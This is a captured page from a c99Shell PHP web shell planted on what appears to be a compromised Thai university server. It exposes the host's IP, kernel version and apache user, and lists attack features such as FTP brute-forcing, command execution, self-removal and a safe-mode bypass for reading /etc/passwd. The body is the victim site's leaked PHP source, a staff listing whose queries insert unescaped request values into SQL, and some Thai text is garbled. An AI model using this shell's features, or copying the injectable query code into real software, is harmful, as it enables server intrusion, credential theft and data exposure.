110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/teacher_aj_viratt/Dentist/ drwxr-xr-x Free 52.41 GB of 127.8 GB (41%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php

 session_start();

if (session_is_registered("valid_user"))

{

$Username = $valid_user;

include("../../include/FunctionDB.php"); 

include("./header.php");  

ConnectDB();

$strSQL = "SELECT * FROM  account  Where   Teacher_code='$Teacher_code'  GROUP By  Teacher_code  ";

$result = mysql_query($strSQL); 

$num = mysql_num_rows($result);

?> 

<html>

<head>

<title>Display  List</title>

<meta http-equiv="Content-Type" content="text/html; charset=windows-874">

<link href="../../css/style1.css" rel="stylesheet" type="text/css">

<style type="text/css">

<!--

.style6 {color: #003333}

-->

</style>

</head>

<body bgcolor="#F2FCED">

<p>&nbsp;</p>

<table width="68%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#999999" style="background-color:#eeeeee; border:1px solid gray"size="12">

  <tr>

    <td height="25" colspan="4"  background="../../Image/bdevel.jpg"><div align="center"><font color="#993333" size="4" face="Tahoma"><strong>бКґ§ўйНБЩЕЎТГа§Ф№ГТВ·С№µбѕ·Вм</strong></font></div></td>

  </tr>

  <tr bgcolor="#CCCCCC">

    <td width="6%" bordercolor="#999966" style="border:1px solid gray"><div align="center"><strong><font color="#000000" size="2" face="Tahoma">No.</font></strong></div></td>

    <td width="31%" bordercolor="#999966" style="border:1px solid gray"><div align="center"><strong><font size="2" face="Tahoma">бКґ§ГТВЎТГµТБЗС№·Хи</font></strong></div></td>

    <td width="39%" bordercolor="#999966" style="border:1px solid gray"><div align="center"><strong><font size="2" face="Tahoma">бКґ§ГТВГСєГЗБ·Сй§ЛБґ</font></strong></div></td>

    <td width="24%" bordercolor="#999966" style="border:1px solid gray"><div align="center"><strong><font size="2" face="Tahoma">ЁУ№З№ГТВЎТГ·Сй§ЛБґ</font></strong></div></td>

  </tr>

  <?php

$i = 1;

 while($row = mysql_fetch_array($result))

 {



     if($count==0)

     {

?>

  <tr >

    <td align=center bgcolor="#F7F7F7" ><strong><font color="#996600" size="2" face="Tahoma">

      <?=$i?>

    </font></strong></td>

    <td align=center bgcolor="#F7F7F7" ><div align="left"><font color="#996600" size="2" face="Tahoma">  <div align="left"><?=$row["Teacher_code"]?> <a href="DentisByday.php?Teacher_code=<?=$row["Teacher_code"]?>"title="Click to see Detail" class="d">      

        <font size="2" face="Tahoma"><span class="d style3"><font size="2" face="Tahoma"><span class="style6"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma">

        <font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma">

        <?php

         $Teacher_code =  $row["Teacher_code"];

         $sql = "Select * From personal_tb Where Teacher_code='$Teacher_code'";

          $result1 = mysql_query($sql) or die("Error".mysql_error());

          $rss = mysql_fetch_array($result1);

          echo "$rss[First_name] $rss[Teacher_name] $rss[Teacher_lastname]";

         ?>

        </font></font></font></font> </font></font></font></span></font></span></font> </div>

    <td align=center bgcolor="#F7F7F7" ><div align="left"><font color="#996600" size="2" face="Tahoma"> <a href="FrmDentiscode.php?Teacher_code=<?=$row["Teacher_code"]?>"title="Click to see Detail" class="d">      

        <font size="2" face="Tahoma"><span class="d style1"><font size="2" face="Tahoma"><span class="style6"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma">

         <?php

         $Teacher_code =  $row["Teacher_code"];

         $sql = "Select * From personal_tb Where Teacher_code='$Teacher_code'";

          $result1 = mysql_query($sql) or die("Error".mysql_error());

          $rss = mysql_fetch_array($result1);

          echo "$rss[First_name] $rss[Teacher_name] $rss[Teacher_lastname]";

         ?>

</font><font color="#003366" size="2" face="Tahoma"><span class="style9"><font color="#003366" size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma">

</font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></span></font><font size="2" face="Tahoma">         </font></font></font></font></font></font></font></span></font></span></font></div>

    <td align=center bgcolor="#F7F7F7" ><strong><font color="#996600" size="2" face="Tahoma">

      <?php

    $Dentis_code = $row[Dentis_code];

    $sql2 = "Select * From  account  Where Teacher_code='$Teacher_code' ";

    $result2 = mysql_query($sql2);

    $countnum = mysql_num_rows($result2);

     echo $countnum;

    

    ?>

    </font></strong></td>

  </tr>

  <?

    $count=1;

     }

else

{

?>

  <tr>

    <td align="center" bordercolor="#999966" bgcolor="#FFFFFF" ><strong><font color="#996600" size="2" face="Tahoma">

      <?=$i?>

    </font></strong></td>

    <td align="center" bgcolor="#FFFFFF" ><div align="left"><font color="#996600" size="2" face="Tahoma"> <div align="left"> 

      <?=$row["Teacher_code"]?><a href="DentisByday.php?Teacher_code=<?=$row["Teacher_code"]?>"title="Click to see Detail" class="d"> <font size="2" face="Tahoma"><span class="d style3"><font size="2" face="Tahoma"><span class="style6"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma">

      <?php

         $Teacher_code =  $row["Teacher_code"];

         $sql = "Select * From personal_tb Where Teacher_code='$Teacher_code'";

          $result1 = mysql_query($sql) or die("Error".mysql_error());

          $rss = mysql_fetch_array($result1);

          echo "$rss[First_name] $rss[Teacher_name] $rss[Teacher_lastname]";

         ?>

      </font></font></font></font></font></font></font></span></font></span></font><a href="FrmDentiscode.php?Teacher_code=<?=$row["Tencher_code"]?>"title="Click to see Detail" class="d">   

    </div></td>

    <td height="18" align="center" bgcolor="#FFFFFF" ><div align="left"><font color="#996600" size="2" face="Tahoma"> <a href="FrmDentiscode.php?Teacher_code=<?=$row["Teacher_code"]?>"title="Click to see Detail" class="d">  <font size="2" face="Tahoma"><span class="d style1"><font size="2" face="Tahoma"><span class="style6"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma">

      <?php

         $Teacher_code =  $row["Teacher_code"];

         $sql = "Select * From personal_tb Where Teacher_code='$Teacher_code'";

          $result1 = mysql_query($sql) or die("Error".mysql_error());

          $rss = mysql_fetch_array($result1);

          echo "$rss[First_name] $rss[Teacher_name] $rss[Teacher_lastname]";

         ?>

    </font></font></font></font></font></font></font></span></font></span></font>    </div></td>

    <td align="center" bgcolor="#FFFFFF" ><strong><font color="#996600" size="2" face="Tahoma">

      <?php

    $Dentis_code = $row[Dentis_code];

    $sql2 = "Select * From  account  Where Teacher_code='$Teacher_code' ";

    $result2 = mysql_query($sql2);

    $countnum = mysql_num_rows($result2);

     echo $countnum;

    ?>

    </font></strong></td>

  </tr>

  <?

$count=0;

}

$i++;

 }    



?>

  <tr>

    <td height="25" colspan="4" align="center" background="../../Image/bdevel.jpg"><div align="center"><strong><font color="#000000" size="2" face="Tahoma">·Сй§ЛБґ</font><font color="#993333" size="2" face="Tahoma"> <? echo $num ?></font><font color="#000000" size="2" face="Tahoma"> ¤№</font></strong></div></td>

</table>

<p align="center">&nbsp;</p>

</html>

<? 

CloseDB();

?>

<?php 

    }

else

{

    echo"<body bgcolor=\"#CCCCCC\">";

     echo"<meta http-equiv=\"refresh\" content=\"3;URL=../logout.php\" target=\"mainFrame\">\n";

     echo"<center>";

      echo"<br><br><br><b><font face=\"Tahoma\" size=\"4\" color=\"#FF0000\">Please Login</font> </b><br>";

      echo"<br><br><font face=\"Tahoma\" size=\"10\" color=\"#000000\"> ERROR 404 PERMISION DENY</font><br>";

      echo"<br><font face=\"Tahoma\" size=\"4\" color=\"#000000\"> ¤ШідБиБКФ·ёмгЄй§Т№</font>";

      echo"</center>";

      echo"</body>";

} 

?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: